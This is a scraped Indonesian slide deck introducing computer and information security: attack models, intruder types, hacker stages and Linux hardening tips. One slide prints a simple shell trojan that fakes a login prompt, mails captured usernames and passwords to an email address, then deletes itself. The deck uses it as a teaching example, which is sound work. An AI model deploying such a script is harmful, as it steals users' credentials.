1 / 43

PENDAHULUAN

PENDAHULUAN. Konsep Dasar Komunikasi : Perkembangan Teknologi Informasi (TI) menyebabkan perubahan terhadap cara pandang manusia terhadap suatu informasi Informasi merupakan isi ( content ) yang dibawa oleh proses komunikasi

afric
Download Presentation

PENDAHULUAN

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. PENDAHULUAN Konsep Dasar Komunikasi : Perkembangan Teknologi Informasi (TI) menyebabkan perubahan terhadap cara pandang manusia terhadap suatu informasi Informasi merupakan isi (content) yang dibawa oleh proses komunikasi Informasi harus terjamin kesahihan dan validitasnya

  2. Informasi Mengandung muatan-muatan data yang dijadikan sebagai the meaning of content dalam komunikasi Kumpulan bit-bit data yang mempunyai makna tertentu, yang diolah dengan cara tertentu dan dikomunikasikan dengan cara tertentu (sudut pandang informatika) Informasi sebagai view of point • Bagaimana informasi bisa diolah sehingga dapat dimanfaatkan • secara optimal, misal mudah ditemukan saat dibutuhkan • Bagaimana validitas dan kebenaran informasi bisa dijamin • Bagaimana informasi rahasia bisa diamankan

  3. Komputer dan Informasi Komputer sebagai penghasil informasi ? Komputer sebagai pengolah informasi ? Komputer sebagai sarana komunikasi informasi ? Komputer sebagai alat validasi informasi ? Komputer sebagai pengontrol informasi ? Era Komputerisasi Informasi • Komputer dianggap sebagai pusat dari proses informasi : • Komputer sebagai penghasil dan pengolah • informasi • Komputer tersebut bebas dari gangguan sistem • dan keamanan • Utamakan keamanan Informasi

  4. Keamanan Komputer meliputi : • KeamananFisik (Hardware) • Ancaman-ancaman : • - Hubungsingkatjalurrangkaian MB • - KenaikanSuhuKomputer • - Tegangan Yang Tidakstabil • - KerusakanAkibatListrikStatis

  5. Keamanan yang bersifatfisik(physical security): termasukakses orang kegedung, peralatan, dan media yang digunakan. Contoh : • Wiretappingatauhal-hal yang ber-hubungandenganakseskekabelataukomputer yang digunakanjugadapatdimasukkankedalamkelasini. • Denial of service, dilakukanmisalnyadenganmematikanperalatanataumembanjirisalurankomunikasidenganpesan-pesan (yang dapatberisiapasajakarena yang diutamakanadalahbanyaknyajumlahpesan). • Synch Flood Attack, dimanasistem (host) yang ditujudibanjiriolehpermintaansehinggadiamenjaditerlalusibukdanbahkandapatberakibatmacetnyasistem (hang).

  6. Keamanan yang berhubungandengan orang (personel), Contoh : • Identifikasi user (username dan password) • Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola). Keamanan dari data dan media serta teknik komunikasi (communications). Keamanandalamoperasi: Adanyaprosedur yang digunakanuntuk mengaturdanmengelolasistemkeamanan, Dan Jugater-masukprosedursetelahserangan (post attack recover)

  7. KarakteristikPenyusup • The Curious (Si InginTahu) - tipepenyusupinipadadasarnyatertarikmenemukanjenissistemdan data yang andamiliki. • The Malicious (Si Perusak) - tipepenyusupiniberusahauntukmerusaksistemanda, ataumerubah web page anda. • The High-Profile Intruder (Si ProfilTinggi) - tipepenyusupiniberusahamenggunakansistemandauntukmemperolehpopularitasdanketenaran. Diamungkinmenggunakansistemprofiltinggiandauntukmengiklankankemampuannya. • The Competition (Si Pesaing) - tipepenyusupinitertarikpada data yang andamilikidalamsistemanda. Iamungkinseseorang yang beranggapanbahwaandamemilikisesuatu yang dapatmenguntungkannyasecarakeuanganatausebaliknya

  8. Istilahbagipenyusup • Mundane ; tahumengenai hacking tapitidakmengetahuimetodedanprosesnya. • lamer (script kiddies) ; mencobascript2 yang pernahdibuatolehaktivis hacking, tapitidakpahambagaimanacaramembuatnya. • wannabe ; pahamsedikitmetode hacking, dansudahmulaiberhasilmenerobossehinggaberfalsafah ; HACK IS MY RELIGION. • larva (newbie) ; hacker pemula, teknik hacking mulaidikuasaidenganbaik, seringbereksperimen. • hacker ; aktivitas hacking sebagai profesi. • wizard ; hacker yang membuatkomunitaspembelajarandiantaramereka. • guru ; master of the master hacker, lebihmengarahkepenciptaan tools-tools yang powerfull yang salahsatunyadapatmenunjangaktivitas hacking, namunlebihjadi tools pemrograman system yang umum.

  9. KeamananSistem Software • Pengamanan Sistem Operasi • Pengamanan Sistem Basis Data • Pengamanan Program Aplikasi

  10. Mengapa perlu aman ? Resiko kerugian finansial Resiko kerugian kerahasiaan Resiko kerugian harga diri Dan lain-lain Motif-motif serangan pada sistem komputer : Politis Finansial Dendam (sakit hati) Iseng Sebagai pekerjaan (cracker bayaran) Dan lain-lain

  11. Aspek-aspek keamanan :Garfinkel “PGP” O’Reilrlly & Associates Inc 1995 • 1. Privacy / Confidentiality • Defenisi : menjagainformasidariorang yang tidakberhakmengakses. • Privacy : lebihkearah data-data yang sifatnyaprivat , Contoh : e-mail seorangpemakai(user) tidakbolehdibacaoleh administrator. • Confidentiality : berhubungandengan data yang diberikankepihak lain untukkeperluantertentudanhanyadiperbolehkanuntukkeperluantertentutersebut.

  12. Contoh : data-data yang sifatnyapribadi (sepertinama, tempattanggallahir, social security number, agama, status perkawinan, penyakit yang pernahdiderita, nomorkartukredit, dansebagainya) harusdapatdiproteksidalampenggunaandanpenyebarannya. • BentukSerangan : usahapenyadapan (dengan program sniffer). • Usaha-usaha yang dapatdilakukanuntukmeningkatkan privacy dan confidentiality adalahdenganmenggunakanteknologikriptografi

  13. Integrity • Defenisi : informasitidakbolehdiubahtanpaseijinpemilikinformasi. • Contoh : e-mail diintercept ditengahjalan, diubahisinya, kemudianditeruskankealamat yang dituju. • Bentukserangan : Adanya virus, trojan horse, ataupemakai lain yang mengubahinformasitanpaijin, “man in the middle attack” dimanaseseorangmenempatkandiriditengahpembicaraandanmenyamarsebagaiorang lain.

  14. Authentication • Defenisi : metodauntukmenyatakanbahwainformasibetul-betulasli, atauorang yang mengaksesataumemberikaninformasiadalahbetul-betulorang yang dimaksud.

  15. Dukungan : • Adanya Tools membuktikankeasliandokumen, dapatdilakukandenganteknologi watermarking(untukmenjaga“intellectual property”, yaitudenganmenandaidokumenatauhasilkaryadengan “tandatangan” pembuat ) dan digital signature. • Access control, yaituberkaitandenganpembatasan orang yang dapatmengaksesinformasi. User harusmenggunakan password, biometric (ciri-cirikhas orang), dansejenisnya.

  16. Availability • Defenisi : berhubungandenganketersediaaninformasiketikadibutuhkan. • Contohhambatan : • “denial of service attack” (DoS attack), dimana server dikirimipermintaan (biasanyapalsu) yang bertubi-tubiataupermintaan yang diluarperkiraansehinggatidakdapatmelayanipermintaan lain ataubahkansampai down, hang, crash.

  17. mailbomb, dimanaseorangpemakaidikirimie-mail bertubi-tubi (katakanribuan e-mail) denganukuran yang besarsehingga sang pemakaitidakdapatmembuka e-mailnyaataukesulitanmengakses e-mailnya.

  18. Access Control • Defenisi : carapengaturanakseskepadainformasi. berhubungandenganmasalah • authentication danjuga privacy • Metode : menggunakankombinasiuserid/password ataudengan • menggunakanmekanisme lain

  19. Non-repudiation • Defenisi : Aspekinimenjaga agar seseorangtidakdapatmenyangkaltelahmelakukansebuahtransaksi. Dukunganbagi electronic commerce.

  20. Security Attack Models : Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice Hall, 1995.] serangan (attack) terdiri dari : • Interruption: Perangkatsistemmenjadirusakatautidaktersedia. Seranganditujukankepadaketersediaan (availability) darisistem. Contohseranganadalah “denial of service attack”. • Interception: Pihak yang tidakberwenangberhasilmengakses asset atauinformasi. Contohdariseranganiniadalahpenyadapan (wiretapping).

  21. Modification: Pihak yang tidakberwenangtidaksajaberhasilmengakses, akantetapidapatjugamengubah (tamper) aset. Contohdariseranganiniantara lain adalahmengubahisidari web site denganpesan-pesan yang merugikanpemilik web site. • Fabrication: Pihak yang tidakberwenangmenyisipkanobjekpalsukedalamsistem. Contohdariseranganjenisiniadalahmemasukkanpesan-pesanpalsuseperti e-mail palsukedalamjaringankomputer

  22. Normal Communication

  23. Interruption Suatu aset sistem dihancurkan, sehingga tidak lagi tersedia atau tidak dapat digunakan Misalnya : perusakan terhadap suatu item hardware, pemutusan jalur komunikasi, disable sistem manajemen file Serangan terhadap layanan availability sistem

  24. Interception Pengaksesan asset informasi oleh orang yang tidak berhak Misalnya oleh seseorang, program, atau komputer Contoh serangan ini pencurian data pengguna kartu kredit Pengerangan terhadap layanan confidentiality

  25. Modification Pengaksesan data oleh orang yang tidak berhak, kemudian ditambah, dikurangi, atau diubah setelah itu baru dikirimkan pada jalur komunikasi Contoh pengubahan suatu nilai file data Merupakan jenis serangan terhadap layanan integrity

  26. Fabrication Seorang user yang tidak berhak mengambil data, kemudian menambahkannya dengan tujuan untuk dipalsukan Merupakan serangan terhadap layanan authentication

  27. Memahami Hacker bekerja Secaraumummelaluitahapan-tahapan sebagaiberikut : • Tahapmencaritahu system komputersasaran. • Tahappenyusupan • Tahappenjelajahan • Tahapkeluardanmenghilangkanjejak.

  28. #!/bin/sh • ################################### • # Nama program : my_login • # Deskripsi :Program kuda trojan sederhana • # versi 1.0 February 30 TahunKuda • #################################### • COUNTER=0 • Cat /etc/issue • While [ "$COUNTER" –ne 2 ] • do • let COUNTER=$COIUNTER+1 • echo "login: \c" • read LOGIN • stty echo • echo "password: \c" • read PASSWORD • echo "User $LOGIN : $PASSWORD" | mail gadis@company.com • stty echo • echo • echo "Login Incorrect" • done • rm $0 • kill –9 $PPID

  29. PRINSIPDASARPERANCANGAN SISTEM YANG AMAN • Mencegahhilangnya data • Mencegahmasuknyapenyusup

  30. LapisanKeamanan 1. LapisanFisik : • membatasiaksesfisikkemesin : • Aksesmasukkeruangankomputer • pengunciankomputersecara hardware • keamanan BIOS • keamananBootloader • back-up data : • pemilihanpiranti back-up • penjadwalan back-up

  31. mendeteksigangguanfisik : • log file : Log pendekatautidaklengkap, Log yang berisikanwaktu yang aneh, Log denganpermisiataukepemilikan yang tidaktepat, Catatanpelayanan reboot atau restart, Log yang hilang, masukansuatau login daritempat yang janggal • mengontrolaksessumberdaya.

  32. 2. Keamananlokal • Berkaitan dengan user dan hak-haknya : • Beri mereka fasilitas minimal yang diperlukan. • Hati-hatiterhadapsaat/darimanamereka login, atautempatseharusnyamereka login. • Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses.

  33. 3. Keamanan Root • Ketikamelakukanperintah yang kompleks, cobalahdalamcara yang tidakmerusakdulu, terutamaperintah yang menggunakanglobbing: contoh, andainginmelakukan (rm) • foo*.bak", pertamacobadulu: "lsfoo*.bak" danpastikanandainginmenghapus file-file yang andapikirkan.

  34. Beberapa orang merasaterbantuketikamelakukan "touch /-i" padasistemmereka. Hal iniakanmembuatperintah-perintahseperti : "rm -fr *" menanyakanapakahandabenar-benaringinmenghapusseluruh file. (Shell andamenguraikan "-i" dulu, danmemberlakukannyasebagai option -ikerm). • Hanyamenjadi root ketikamelakukantugastunggaltertentu. Jikaandaberusahamengetahuibagaimanamelakukansesuatu, kembalike shell pemakai normal hinggaandayakinapa yang perludilakukanoleh root.

  35. Jalurperintahuntukpemakai root sangatpenting. Cobalahdanbatasijalurperintahbagipemakai root sedapatmungkin, danjanganpernahmenggunakan '.', yang berarti 'direktorisaatini', dalampernyataan PATH anda. Sebagaitambahan, janganpernahmenaruhdirektori yang dapatditulispadajalurpencariananda, karenahalinimemungkinkanpenyerangmemodifikasiataumenaruh file binerdalamjalurpencariananda, yang memungkinkanmerekamenjadi root ketikaandamenjalankanperintahtersebut.

  36. Janganpernahmenggunakanseperangkatutilitas rlogin/rsh/rexec (disebututilitas r) sebagai root. Merekamenjadisasaranbanyakserangan, dansangatberbahayabiladijalankansebagai root. Janganmembuat file .rhostsuntuk root.

  37. File /etc/security berisikandaftar terminal-terminal tempat root dapat login. Secarabaku (padaRedHat Linux) disethanyapadakonsol virtual lokal (vty). Berhati-hatilahsaatmenambahkan yang lain ke file ini. Andaseharusnya login darijarakjauhsebagaipemakaibiasadankemudian 'su' jikaandabutuh (mudah-mudahanmelaluisshatausaluranterenkripsi lain), sehinggatidakperluuntuk login secaralangsungsebagai root.

  38. Selaluperlahandanberhati-hatiketikamenjadi root. Tindakanandadapatmempengaruhibanyakhal. Pikirsebelumandamengetik!

  39. 4. Keamanan File dan system file • Directory home user tidakbolehmengaksesperintahmengubah system sepertipartisi, perubahan device dan lain-lain. • Lakukan setting limit system file. • Aturaksesdan permission file : read, write, execute bagi user maupun group. • Selalucek program-program yang tidakdikenal

  40. 5. Keamanan Password danEnkripsi • Hati-hatiterhadap brute force attack denganmembuat password yang baik. • Selalumengenkripsi file yang dipertukarkan. • Lakukan pengamanan pada level tampilan, seperti screen saver.

  41. 6. Keamanan Kernel • selalu update kernel system operasi. • Ikuti review bugs dankekurang-kekuranganpada system operasi 7. KeamananJaringan • Waspadaipaket sniffer yang seringmenyadap port Ethernet. • Lakukanproseduruntukmengecekintegritas data • Verifikasiinformasi DNS • Lindungi network file system • Gunakan firewall untuk barrier antarajaringan private denganjaringaneksternal

More Related